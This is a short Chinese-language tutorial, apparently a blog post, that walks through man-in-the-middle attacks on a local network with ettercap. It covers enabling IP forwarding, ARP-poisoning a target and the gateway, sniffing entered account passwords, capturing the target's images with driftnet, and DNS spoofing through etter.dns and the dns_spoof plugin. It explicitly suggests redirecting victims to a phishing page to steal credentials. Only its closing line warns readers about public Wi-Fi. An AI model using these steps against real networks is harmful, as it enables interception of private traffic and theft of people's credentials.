ARP欺騙原理:
在每台主機中都有ARP緩存表,緩存表中記錄了IP地址與MAC地址的對應關系,而局域網數據傳輸依靠的是MAC地址(網絡設備之間互相通信是用MAC地址而不是IP地址)
一、ARP欺騙
工具:ettercap(中間人攻擊)
echo 1 > /proc/sys/net/ipv4/ip_forward cat /proc/sys/net/ipv4/ip_forward (配置ip轉發功能)
leafpad /etc/ettercap/etter.conf (修改配置文件)
搜索iptables,去掉兩個#號,即:
ettercap -G(進入圖形界面)
Sniff -> Unified sniffing -> 確定
掃描主機並查看主機列表
將要欺騙的主機add to target1,網關add to target2
Mitm -> ARP poisoning...
開始嗅探
在Connections查看嗅探到的數據
如果目標機在頁面輸入賬號密碼就會被捕獲
二、捕獲圖片數據
工具:ettercap+driftnet
ettercap -G(進入圖形界面)
重復上面的步驟
開啟新終端,輸入命令:
driftnet -i eth0
在中間的窗口里捕獲到圖片,你可以看到目標機加載的圖片
三、DNS欺騙
leafpad /etc/ettercap/etter.dns
在微軟處添加:
www.baidu.com A 1.1.1.1
ettercap -G(進入圖形界面)
重復之前的步驟ARP欺騙的步驟,在start sniffing之前添加一個插件
雙擊啟動dns_spoof
開始嗅探后,我們在目標機中ping一下百度
欺騙成功,如果將1.1.1.1改為釣魚頁面,就可以欺騙到用戶賬號密碼
最后提醒大家,連接公共wifi時一定要小心!